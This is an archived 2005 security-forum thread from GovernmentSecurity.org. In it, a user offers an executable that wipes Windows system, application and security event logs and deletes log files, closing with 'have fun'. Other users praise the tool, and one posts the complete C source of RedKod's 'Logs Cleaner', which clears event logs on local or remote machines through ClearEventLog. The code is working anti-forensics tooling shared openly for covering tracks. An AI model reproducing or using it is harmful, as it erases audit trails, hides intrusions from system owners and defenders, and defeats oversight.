Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
Full Version: Logs Cleaner
GovernmentSecurity.org > System Security > Trial Member Uploads
andi1983
Aug 5 2005, 07:27 PM
just start the log.exe and it will clean all system, application and security logs and delete all log files in windows directory!
have fun ph34r.gif
Over
Aug 6 2005, 07:58 AM
QUOTE(andi1983 @ Aug 5 2005, 07:27 PM)
and delete all log files in windows directory!
have fun  ph34r.gif
*



Which logs they delete? All *.log in the system root?

Over
andi1983
Aug 6 2005, 08:12 AM
QUOTE(Over @ Aug 6 2005, 07:58 AM)
QUOTE(andi1983 @ Aug 5 2005, 07:27 PM)
and delete all log files in windows directory!
have fun  ph34r.gif
*



Which logs they delete? All *.log in the system root?

Over
*



yes run it and you will see
ComSec
Aug 6 2005, 01:47 PM
thanks for your contributions and previous posts... upgraded to full member wink.gif
Enhire
Aug 6 2005, 07:47 PM
I using ClearLogs good tool but your cleaner is very good :]
skydance
Aug 6 2005, 07:48 PM
and here's source code of a log cleaner from redkod:
CODE

/*
______            _  _   __            _
| ___ \          | || | / /           | |
| |_/ /  ___   __| || |/ /   ___    __| |
|    /  / _ \ / _` ||    \  / _ \  / _` |
| |\ \ |  __/| (_| || |\  \| (_) || (_| |
\_| \_| \___| \__,_|\_| \_/ \___/  \__,_|
                                         
  Logs Cleaner for WinNT Systems (nt4?, 2k, XP)

               - Version 0.1 -
                                     RedKod Team
                                   www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

*/

#include <windows.h>
#include <stdio.h>

char *DisplayError(void)
{
LPVOID error;
char *buffer=NULL;

FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL,
   GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&error, 0, NULL);

buffer = (char *)GlobalAlloc(GPTR, strlen(error)+1);
sprintf(buffer, "%s", error);

return(buffer);
}

int ErareLog(const char *host, const char *type)
{
HANDLE hEvent;

hEvent = RegisterEventSource(host, type);
if(hEvent == NULL)
{
 fprintf(stderr, "Could not register event source. %s", DisplayError());
       return(-1);
}

if(ClearEventLog(hEvent, NULL) == 0)
{
 fprintf(stderr, "Error while erasing the logfile. %s", DisplayError());
 return(-1);
}

fprintf(stdout, "[*] %s log erased.\n", type);

DeregisterEventSource(hEvent);

return(0);
}

int main(int argc, char **argv)
{
   char *version = "\nLogs cleaner 0.1 for WinNT systems by R-e-D\n"
    "\thttp://www.redkod.com/\n"
    "\t   r-e-d@redkod.com\n\n";
 

fprintf(stdout, "%s", version);

if(argc < 3)
{
 fprintf(stdout, "Usage : %s [\\ComputerName] <-a (Applications) / -e (Security) / -s (System) / -r (All) / -t <name> >\n", argv[0]);
 return(-1);
}

switch(argv[2][1])
{
case 'a':
 /* Applications */
 ErareLog(argv[1], "Applications");
 break;
   case 'e':
 /* Security */
 ErareLog(argv[1], "Secu");
 break;
case 's':
 /* System */
 ErareLog(argv[1], "System");
 break;
case 'r':
 /* All */
 ErareLog(argv[1], "Applications");
 ErareLog(argv[1], "Secu");
 ErareLog(argv[1], "System");
 break;
case 't':
 /* Type specified by user */
 ErareLog(argv[1], argv[3]);
 break;
default:
 /* Uh? */
 fprintf(stdout, "Please, specify a correct event log type.\n");
 return(-1);
 break;
}

return(0);
}
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.